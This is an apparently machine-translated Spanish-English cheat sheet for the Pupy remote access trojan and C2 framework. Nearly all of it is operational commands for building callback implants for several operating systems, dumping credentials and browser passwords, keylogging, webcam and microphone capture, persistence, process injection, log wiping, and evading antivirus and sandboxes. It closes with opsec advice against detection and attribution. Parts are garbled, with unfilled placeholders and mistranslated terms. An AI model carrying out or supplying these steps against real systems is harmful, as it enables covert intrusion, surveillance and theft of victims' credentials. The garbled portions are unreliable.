Pupy
_# Copiar la hoja de cajete C2
Overview¶
Pupy es un marco de acceso remoto de código abierto y multiplataforma (RAT) y post-explotación escrito en Python y C. Admite plataformas Windows, Linux, OSX y Android con capacidades de ejecución de memoria y diseño de huella mínima.
▪ restablecimiento Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación¶
Git install¶
# Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
# Install dependencies (Ubuntu/Debian)
sudo apt-get install python2.7-dev python-pip python-setuptools build-essential swig python-dev libssl-dev libffi-dev
# Install Python requirements
pip install -r pupy/requirements.txt
# Create workspace
./create-workspace.py -DG pupyws
cd pupyws
Docker Instalación¶
# Build Docker image
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
docker build -t pupy .
# Run Pupy in Docker
docker run -it -v /tmp/pupyws:/opt/pupy/pupyws pupy
Instalación de Windows¶
# Install Python 2.7
# Download and install Microsoft Visual C++ Compiler for Python 2.7
# Clone repository
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
# Install requirements
pip install -r pupy/requirements.txt
# Create workspace
python create-workspace.py pupyws
cd pupyws
Uso básico¶
Start Pupy Server¶
# Start server with default configuration
./pupysh
# Start with custom configuration
./pupysh --config custom_config.py
# Start with specific transport
./pupysh --transport ssl
Generación de clientes¶
# Generate Windows client
gen -f client -O windows -A x86 -o windows_client.exe
# Generate Linux client
gen -f client -O linux -A x64 -o linux_client
# Generate Android APK
gen -f apk -o android_client.apk
Command Reference¶
Server Management¶
| Command | Description |
|---|---|
| INLINE_CODE_31 | Show help menu |
| INLINE_CODE_32 | List active sessions |
| INLINE_CODE_33 | Interact with session |
| INLINE_CODE_34 | List running jobs |
| INLINE_CODE_35 | Kill running job |
| INLINE_CODE_36 | Exit Pupy server |
Client Generation¶
| Command | Description |
|---|---|
| INLINE_CODE_37 | Show generation help |
| INLINE_CODE_38 | Generate client |
| INLINE_CODE_39 | Generate Android APK |
| INLINE_CODE_40 | Generate Python payload |
| INLINE_CODE_41 | Generate PowerShell payload |
Session Interaction_TABLE_62__¶
Opciones de generación de clientes¶
Clientes de Windows¶
# Windows executable (x86)
gen -f client -O windows -A x86 -o windows_x86.exe
# Windows executable (x64)
gen -f client -O windows -A x64 -o windows_x64.exe
# Windows DLL
gen -f dll -O windows -A x86 -o windows_dll.dll
# Windows service executable
gen -f client -O windows -A x64 --service -o windows_service.exe
# PowerShell payload
gen -f ps1 -o payload.ps1
Clientes Linux¶
# Linux ELF (x86)
gen -f client -O linux -A x86 -o linux_x86
# Linux ELF (x64)
gen -f client -O linux -A x64 -o linux_x64
# Linux shared library
gen -f so -O linux -A x64 -o linux_lib.so
# Python payload
gen -f py -o payload.py
MacOS Clients¶
# macOS binary
gen -f client -O darwin -A x64 -o macos_client
# macOS application bundle
gen -f app -O darwin -A x64 -o macos_app.app
Clientes Android¶
# Android APK
gen -f apk -o android_client.apk
# Android APK with custom package name
gen -f apk --package com.example.app -o custom_android.apk
Opciones de transporte¶
SSL Transport¶
# Start SSL listener
listen --port 443 ssl
# Generate client with SSL transport
gen -f client -O windows -A x64 --transport ssl_connect --host 192.168.1.100:443
HTTP Transport¶
# Start HTTP listener
listen --port 80 http
# Generate client with HTTP transport
gen -f client -O windows -A x64 --transport http --host 192.168.1.100:80
TCP Transport¶
# Start TCP listener
listen --port 4444 tcp
# Generate client with TCP transport
gen -f client -O windows -A x64 --transport tcp_cleartext --host 192.168.1.100:4444
Transportes Obfuscados¶
# Obfs3 transport
listen --port 8080 obfs3
# Generate client with obfs3
gen -f client -O windows -A x64 --transport obfs3 --host 192.168.1.100:8080
Post-Exploitation Módulos¶
Información del sistema¶
# Get system information
run sysinfo
# Get environment variables
run getenv
# Get installed software
run installed_software
# Get running processes
run ps
# Get network connections
run netstat
Credential Harvesting¶
# Dump Windows credentials
run hashdump
# Extract browser passwords
run browser_dump
# Dump WiFi passwords
run wifi_passwords
# Extract clipboard content
run clipboard
Persistencia
# Install persistence
run persistence
# Create scheduled task (Windows)
run schtasks
# Registry persistence (Windows)
run registry_persistence
# Cron job persistence (Linux)
run cron_persistence
Operaciones de red¶
# Port scanning
run portscan -t 192.168.1.0/24
# Network discovery
run network_discovery
# ARP spoofing
run arp_spoof -t 192.168.1.10 -g 192.168.1.1
# DNS spoofing
run dns_spoof -d example.com -i 192.168.1.100
Surveillance¶
# Start keylogger
run keylogger
# Take screenshot
run screenshot
# Record microphone
run record_mic -t 30
# Webcam snapshot
run webcam_snap
# Webcam stream
run webcam_stream
Características avanzadas¶
Memory Execution¶
# Load module in memory
load_module /path/to/module.py
# Execute in memory
run memory_exec -f /path/to/executable
# Reflective DLL loading (Windows)
run reflective_dll -f /path/to/dll.dll
Inyección del proceso
# Inject into process
run inject -p <pid> -f /path/to/payload
# Process hollowing
run process_hollow -t notepad.exe -f /path/to/payload
# DLL injection
run dll_inject -p <pid> -f /path/to/dll.dll
Pivoting¶
# SOCKS proxy
run socks -p 1080
# Port forwarding
run portfwd -L 8080:192.168.2.10:80
# Reverse port forwarding
run portfwd -R 9090:127.0.0.1:22
Anti-Forensics¶
# Clear event logs (Windows)
run clear_logs
# Timestomp files
run timestomp -f /path/to/file -t "2020-01-01 12:00:00"
# Secure delete
run secure_delete -f /path/to/file
# Clear tracks
run clear_tracks
Evasion Techniques¶
Payload Obfuscation¶
# Generate with packer
gen -f client -O windows -A x64 --packer upx -o packed_client.exe
# Custom obfuscation
gen -f client -O windows -A x64 --obfuscate -o obfuscated_client.exe
# Encrypted payload
gen -f client -O windows -A x64 --encrypt -o encrypted_client.exe
Anti-Analysis¶
# VM detection
def check_vm():
import subprocess
try:
output = subprocess.check_output(['systeminfo'], shell=True)
vm_indicators = ['VMware', 'VirtualBox', 'QEMU', 'Hyper-V']
for indicator in vm_indicators:
if indicator in output.decode():
return True
except:
pass
return False
# Sandbox evasion
import time
import random
time.sleep(random.randint(60, 300)) # Random sleep
Traffic Obfuscation¶
# Domain fronting
gen -f client -O windows -A x64 --transport http --host cdn.example.com --front-domain legitimate-site.com
# Custom User-Agent
gen -f client -O windows -A x64 --transport http --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Configuración¶
Configuración del servidor¶
# pupy.conf
[pupyd]
workdir = pupyws
scriptlets_path = packages/all;packages/windows;packages/linux;packages/darwin
[ssl]
keyfile = keys/server.key
certfile = keys/server.crt
[http]
port = 80
ssl_port = 443
[logging]
level = INFO
file = pupy.log
Configuración del cliente¶
# Custom transport configuration
TRANSPORT_KWARGS = \\\\{
'ssl': \\\\{
'cert_reqs': ssl.CERT_NONE,
'ssl_version': ssl.PROTOCOL_TLSv1_2,
'ciphers': 'ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM'
\\\\},
'http': \\\\{
'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'headers': \\\\{'Accept': 'text/html,application/xhtml+xml'\\\\},
'proxy': \\\\{'http': 'http://proxy:8080'\\\\}
\\\\}
\\\\}
Troubleshooting¶
Connection Issues¶
# Check listener status
jobs
# Test connectivity
telnet server_ip port
# Check firewall rules
iptables -L
netsh advfirewall show allprofiles
Problemas de generación de clientes¶
# Install missing dependencies
pip install -r pupy/requirements.txt
# Rebuild client templates
./create-workspace.py -DG pupyws
# Check Python version
python --version # Should be 2.7.x
Módulo Carga Errores¶
# Update module path
export PYTHONPATH=$PYTHONPATH:/opt/pupy/pupy
# Reinstall requirements
pip install --upgrade -r pupy/requirements.txt
# Check module dependencies
python -c "import module_name"
Performance Issues¶
# Reduce beacon interval
session -i <id>
set_beacon_interval 30
# Optimize transport
# Use faster transports like TCP for internal networks
# Use compressed transports for slow connections
Operational Security¶
Infrastructure Setup¶
- Usar redirectores y cadenas proxy
- Implementar una gestión adecuada de certificados
- Use dominios legítimos y alojamiento
- Infraestructura rotativa regularmente
- Monitor de detección y atribución
Communication Security¶
- Utilizar transportes cifrados (SSL/TLS)
- Implementar una gestión clave adecuada
- Usar el frente de dominio donde sea posible
- Patrones de comunicación Vary
- Implementar un correcto manejo de errores
Payload Security¶
- Usar obfuscación y embalaje
- Implementar técnicas antianálisis
- Usar cargas de pago fijas cuando sea posible
- Actualizar y rotar las cargas de pago
- Prueba contra las soluciones actuales AV
Resources¶
[Pupy GitHub Repository](URL_55__ - [Documentación impresa](URL_56__ - [n1nj4sec Blog](URL_57__ - [Referencia de módulos de compra](URL_58__
-...
*Esta hoja de trampa proporciona una referencia completa para usar Pupy C2 Framework. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *